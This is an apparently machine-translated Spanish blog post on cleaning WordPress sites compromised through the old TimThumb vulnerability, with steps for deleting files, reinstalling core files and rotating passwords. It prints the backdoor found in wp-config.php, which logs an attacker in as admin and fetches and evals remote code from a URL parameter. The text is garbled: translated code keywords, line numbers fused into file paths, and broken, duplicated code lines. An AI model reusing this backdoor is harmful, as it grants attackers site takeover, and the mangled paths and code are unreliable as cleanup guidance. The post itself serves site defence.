Cómo arreglar y limpiar el TimThumb Hack en WordPress

Así que si recuerdas correctamente, hubo un problema de seguridad con el script de TimThumb en agosto que fue corregido. Sin embargo, para nuestra sorpresa, muchos sitios siguen usando la versión antigua. Hemos arreglado tres sitios en lo que va del mes pasado, uno de ellos ayer. Así que tiene sentido escribir simplemente un artículo paso a paso, para que nuestros usuarios puedan seguirlo. Los tres usuarios para los que arreglamos este problema ni siquiera sabían qué era TimThumb o si lo estaban usando o no.

TimThumb es un script PHP que redimensiona imágenes. Había una vulnerabilidad en él, pero es SEGURO utilizarlo ahora.

Entonces, ¿cómo sabe que su sitio ha sido pirateado? Si usted ve una gran pantalla roja en su navegador cuando visita su sitio:

Si empiezas a ser bombardeado con emails sobre usuarios que están siendo redirigidos desde tu sitio. Lo más probable es que su sitio haya sido víctima de esta explotación.

Como medida de precaución, todo el mundo debería utilizar este Timthumb Vulnerability Scanner. Esto le dirá si está usando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron su núcleo de inmediato. Así que este plugin comprobará si la nueva versión segura de Timthumb está instalada o si hay una versión anterior instalada.

Ahora bien, si su sitio ya cayó presa de esta hazaña de Timthumb, entonces aquí está lo que necesita hacer.

En primer lugar, debe eliminar los siguientes archivos:

12/wp-admin/upd.php/wp-content/upd.php

Inicie sesión en el panel de administración de WordPress y reinstale su versión de WordPress. Estamos buscando específicamente reinstalar estos archivos:

123/wp-settings.php/wp-incluye/js/jquery/jquery.js/wp-incluye/js/110n.js

Luego abra su wp-config.php donde muy probablemente encontrará este gran código malicioso que está recolectando credenciales de inicio de sesión y cookies. Este código estará hacia abajo.

123456789101112131414151617171819202122232425262728293031if(isset($_GET['pingnow'])&& isset($_GET['pass'])){si($_GET['pass']) == 19ca14e7ea6328a42e0eb13d585e4c22'){if($_GET['pingnow']== 'login'){$user_login= 'admin';user= get_userdatabylogin($user_login);user_id= $user->ID;wp_set_current_user($user_id, $user_login);wp_set_auth_cookie($user_id);do_action('wp_login', $user_login);if(($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){$ch= curl_init($_GET['file']);$fnm= md5(rand(0,100)).curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch);curl_close($ch);fclose($f);fclose($fp);echo "location.href='$fnm';";}if(($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){$ch= curl_init($_GET['file']);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 5);$re= curl_exec($ch);curl_close($ch);eval($re);}}}}.

En la carpeta de su tema, busque en cualquier lugar donde el script TimThumb pueda estar almacenando los archivos en caché. Normalmente están en esta estructura:

12/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Borra todo lo que se parezca a esto. Si no está seguro de las cosas, elimine todo lo que no sea un archivo de imagen.

Lo siguiente que quiere hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php

Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvide cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla "Error al establecer la conexión".

Cambie las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo al generador en línea.

Ahora ya has terminado. No olvide vaciar todas las páginas de los plugins de caché. Como medida de precaución, es bueno borrar también la caché y las cookies de su navegador.

Para los desarrolladores, intenten usar la función Tamaños de imagen adicionales en WordPress para reemplazar las funcionalidades de Timthumb.

Háganos saber si necesita más ayuda utilizando nuestro formulario de contacto.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir